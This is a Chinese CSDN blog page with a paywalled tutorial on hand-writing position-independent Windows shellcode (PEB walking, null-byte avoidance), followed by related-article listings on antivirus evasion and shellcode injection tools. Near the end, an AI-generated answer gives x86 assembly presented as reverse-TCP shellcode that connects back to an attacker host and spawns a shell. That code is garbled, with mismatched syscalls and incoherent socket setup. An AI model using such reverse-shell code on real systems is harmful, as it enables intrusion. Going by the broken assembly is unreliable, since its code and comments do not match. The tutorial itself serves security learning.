用ASM编写一个简单的Windows Shellcode思路总结

最新推荐文章于 2024-10-07 14:39:44 发布
最新推荐文章于 2024-10-07 14:39:44 发布
阅读量490 收藏
点赞数
分类专栏: 网络 安全 安全工具 文章标签: windows c# 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HBohan/article/details/120552822
版权
本文介绍了Shellcode的基本概念,详细讲解了Windows下DLL加载机制、DLL寻址、DLL导出表中函数寻址,以及如何dump Shellcode和编写Golang loader。通过实例展示了如何在避免NULL字节和特殊字符的情况下编写位置无关的Shellcode。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

shellcode 是什么?

“代码也好数据也好只要是与位置无关的二进制就都是shellcode。”
为了写出位置无关的代码,需要注意以下几点:

  • 不能对字符串使用直接偏移,必须将字符串存储在堆栈中
  • dll中的函数寻址,由于 ASLR 不会每次都在同一个地址中加载,可以通过 PEB.PEB_LDR_DATA
    找到加载模块调用其导出的函数,或加载新 dll。
  • 避免空字节

NULL 字节的值为 0x00,在 C/C++ 代码中,NULL 字节被视为字符串的终止符。因此,shellcode 中这些字节的存在可能会干扰目标应用程序的功能,并且我们的 shellcode 可能无法正确复制到内存中。

mov ebx, 0x00
   xor ebx, ebx

用下面的语句代替上面的语句,结果是一样的。

此外,在某些特定情况下,shellcode 必须避免使用字符,例如 \r 或 \n,甚至只使用字母数字字符。

windows下dll加载的机制

在 Windows 中,应用程序不能直接访问系统调用,使用来自 Windows API ( WinAPI ) 的函数,Windows API函数都存储在 kernel32.dll、advapi32.dll、gdi32.dll 等中。ntdll.dll 和 kernel32.dll 非常重要,以至于每个进程都会导入它们:

这是我编写 nothing_to_do 程序,用 listdlls列出导入的 dll:
在这里插入图片描述

dll寻址

TEB(线程环境块)该结构包含用户模式中的线程信息,32位系统中我们可以使用 FS 寄存器在偏移0x30处找到进程环境块(PEB) 的地址。
在这里插入图片描述
PEB.ldr 指向PEB_LDR_DATA提供有关加载模块的信息的结构的指针,包含kernel32 和 ntdll 的基地址

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

PEB_LDR_DATA.InMemoryOrderModuleList 包含进程加载模块的双向链表的头部。列表中的每一项都是指向 LDR_DATA_TABLE_ENTRY 结构的指针

typedef struct _LIST_ENTRY
{
     PLIST_ENTRY Flink;
     PLIST_ENTRY Blink;
} LIST_ENTRY, *PLIST_ENT
最低0.47元/天 解锁文章
shellcode编写探究
hongduilanjun的博客
07-21 1147
shellcode是不依赖环境,放到任何地方都可以执行的机器码。shellcode的应用场景很多,本文不研究shellcode的具体应用,而只是研究编写一个shellcode需要掌握哪些知识。
Windows】从零开始写一个加密壳
古月浪子的博客
02-02 3304
从零开始写一个加密壳认识PE文件结构DOS头NT头EPImageBase重定位表Section TablePE结构总览加壳思路新增Section更改EP加密.text段保存ImageBaseShellCode获取编译好的shellcode编写shellcode获取所需函数手动修复重定位集成shellcode输入与输出成品检验ExeInfoPEIDA 7.5直接运行x32dbg总结及源代码ShellShellcodeGenerator (本文仅为个人学习记录,不保证文章中没有学术性错误或笔误) 认识PE文件结
asm to shellcode
10-18
将汇编转换成shellcode,先写出汇编,然后自动生成shellcode,很是方便
windows编程之Windows Shell 编程
thanklife的专栏
04-11 1966
这里仅仅是记录下该资源,推荐到下文列出的连接进行查看 用VC++ 进行Windows Shell 扩展编成               由ccc编译   序言:        看过一些对windows 外壳的扩展程序,在使用上一般都是直接利用windows的外壳API做一些工作,因为外壳操作需要一些比较专业的知识,因此,大部分编程人员特别是
Windows Shell 编程
邓学彬(泪闯天涯)的专栏
11-19 3327
<br />CHM格式电子书下载:http://download.youkuaiyun.com/source/2843130<br /> <br />说明:该书内容并不是我写的,我只是整理成电子书,方便大家阅读。<br /> <br />一个操作系统外壳的不错的定义是它是一个系统提供的用户界面,它允许用户执行公共的任务,如访问文件系统,导出执行程序,改变系统设置等。MS-DOS有一个Command.COM扮演着这个角色。然而Windows已经有了图形界面环境,他的外壳程序也就必然是图形方式的。在Windows95以前,
ASM快速编写工具
07-12
ASM快速编写工具
shellcode流程
weixin_30345055的博客
02-19 158
shellcode就是汇编的opcode,一般以子函数形式出现: 取得shellcode的方便方式是: 1.写一个函数如: void __stdcall code(LONG &a, LONG &b, DWORD &c, LONG &d, DWORD &e)取得它的汇编码:如: push ebp ...
【0day shellcode编写艺术】—— jmp esp、动态获取api。后续:编码、压缩
desword-- 技术,杂文。
12-11 2839
此次主要徒手体会了一下编写shellcode 的不容易。当真不容易,看着作者的代码,都感觉自己无处可以下手了。 需要的底层原理知识也还挺多需要补充上去的。 打算后期再逐渐补充。目前阶段将jmp esp弄懂了。后面动态获取api在主机上出错了。问题和搜索jmp esp代码时候貌似一样,产生访问越权的问题。后期再继续解决吧。 目前整理一下整个的思路。 1、shellcode、expoit的概念;
免杀对抗—java&ASM&MSF源码特征修改&汇编调用CS&内联C
2301_76227305的博客
10-07 1100
基本常见的语言都讲了一遍了,其中提到的技术无论是哪种语言都是通用的,只要你可以把它写得出来。不难看出修改源码特征的免杀效果是比较好的,还有就是不公开或者自己写的shellcode加密脚本,总之无论是对shellcode修改还是加载器,亦或是源码的修改,最终的目的都只是去除后门的特征,逃过杀软。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
windows 弹shell_一步步学写Windows下的Shellcode
weixin_39602560的博客
10-21 769
如何在WIndows编写一个shellcode?为什么会问这个问题,前段时间在做win下的Exploit,但是都是使用大佬写的shellcode,无法实现个人的一些需求。而网络上编写shellcode的教程大多是关于Linux的,加之顺带学习PE文件结构,所以打算写一篇关于Windowsshellcode编写,为要编写Shellcdoe的读者提供一些参考。摘要:在C语言中,调用一...
shellcode_generator:shellcode,生成器,Visual Studio,C ++,Windows
03-09
shellcode_generator shellcode,生成器,Visual Studio,C ++,Windows
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
64位windows驱动使用asm
weixin_34152820的博客
12-26 748
64位windows驱动使用asm, 要单独写一个asm文件 命令ml64 /c test.asm编译成obj文件 SOURCES加上test.asm .data ; all data variables in your asm code goes here myData1 dq 0 ; 64 bit data .code ; all...
pwntools各使用模块简介
weixin_34259232的博客
09-12 936
pwntools pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,并且里面包含多个模块,使利用变得简单。可以在github上直接搜索pwntools 进行安装。 基本模块 asm : 汇编与反汇编,支持x86/x64/arm/mips/powerpc等基本上所有的主流平台dynelf : 用于远程符号泄漏,需要提供leak方法el...
Windows Shellcode开发[3]
weixin_41487541的博客
03-25 5537
0 前言及编写shellcode准备工作 在Windows Shellcode开发介绍的最后一部分,我们将编写一个简单的改变鼠标左右键的shellcode。我们需要用到两个函数:SwapMouseButton和ExitProcess函数。首先看一个两个函数的参数与返回值情况: SwapMouseButton只有一个BOOL类型参数,若参为TRUE则交换鼠标左右键,返回值非0; ExitProcess也只有一个参数,代表进程退出代码。 整理一下思路: 我们需要调用以上两个函数,在C++中体现
执行shellcode的几种方式
qq_41683305的博客
02-24 5137
首先写出汇编成功弹出计算器 #pragma comment(linker,"/section:.data,RWE") //data段可读写 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口 #pragma comment(linker,"/INCREMENTAL:NO") //指...
shellcode初识
lonelydereng的专栏
06-16 747
这是对shellcode学习的一个初步实践,采用经典的w
ASM介绍及简易教程
热门推荐
自有贵人相助
03-25 3万+
随着 AOP(Aspect Oriented Programming)的发展,代码动态生成已然成为 Java 世界中不可或缺的一环。本文将介绍一种小巧轻便的 Java 字节码操控框架 ASM,它能方便地生成和改造 Java 代码。著名的框架,如 Hibernate 和 Spring 在底层都用到了 ASM。比起传统的 Java 字节码操控框架,BCEL 或者 SERP,它具有更符合现代软件模式的编
编写一个简单Shellcode以实现反向TCP连接的具体步骤和代码示例是什么?
最新发布
11-09
编写一个简单Shellcode实现反向TCP连接,你需要深入理解网络编程和Shellcode的开发。这里提供一个实战项目的关键步骤和示例代码,帮助你实现反向TCP连接。 参考资源链接:[利用Shellcode进行网络安全渗透测试:复杂动作与开发概览](https://wenku.youkuaiyun.com/doc/46o4hp5xwb?spm=1055.2569.3001.10343) 首先,确保你熟悉汇编语言以及你的目标操作系统的网络API。下面是一个基于Linux系统的x86架构的简单示例,使用了socket编程实现反向连接。 1. 创建socket:首先,你需要创建一个TCP socket来实现网络连接。 2. 连接到服务器:通过socket连接到攻击者的主机(监听端口)。 3. 程序执行流程控制:确保连接成功后,程序应该转向执行shell命令。 具体的汇编代码示例如下: ```asm ; Create socket xor eax, eax mul eax ; Clear registers mov bl, 6 mov eax, 0x66 int 0x80 ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP) ; Store socket descriptor in EDI mov edi, eax ; Create the struct for connect() xor eax, eax mov byte [esi], al mov byte [esi+1], 0x11 mov word [esi+2], 0x5c11 xor eax, eax mov byte [esi+4], al mov byte [esi+5], al mov byte [esi+6], al mov byte [esi+7], al ; Store the IP Address and Port in Network Byte Order mov word [esi+8], 0x0202 ; ***.*.*.* in Network Byte Order mov word [esi+10], 0x5c11 ; Port 4444 in Network Byte Order ; Perform the connect() system call mov byte [esi+12], 0x06 ; SOCK_STREAM mov byte [esi+13], 0x01 ; AF_INET mov byte [esi+14], 0x00 ; Use the stack pointer as the buffer mov eax, 0x2000003 ; sys_connect int 0x80 ; Store the socket descriptor for use in writing data ; and close the original descriptor mov ebx, edi xor eax, eax mov al, 6 ; close sys call int 0x80 mov edi, ebx ; Write the shell code to the socket mov eax, 0x4 ; sys_write mov ebx, edi ; file descriptor of the socket mov ecx, esp ; buffer pointer mov edx, 100 ; buffer size int 0x80 ; Execute shellcode from socket xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx int 0x80 ; The exploit should now be running a shell on the ; connected socket. The end of the shellcode should ; be padded with NOPs to ensure that it doesn't break ; any shellcode that might follow it. ; Padding add byte [esi+14], 0x90 ``` 在编写Shellcode时,还需要注意字符编码的转换以及字节对齐的问题。在实际使用中,你可能需要根据实际情况对上述代码进行调整,并确保代码在目标系统的内存中正确执行。 这份示例代码只是一个起点,为了更深入理解Shellcode的开发和利用,建议阅读《利用Shellcode进行网络安全渗透测试:复杂动作与开发概览》。该文档不仅提供了概念性的介绍,还详细地展示了shellcode的开发过程和各种技巧,以及如何在现实世界的安全测试中应用这些知识。 参考资源链接:[利用Shellcode进行网络安全渗透测试:复杂动作与开发概览](https://wenku.youkuaiyun.com/doc/46o4hp5xwb?spm=1055.2569.3001.10343)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值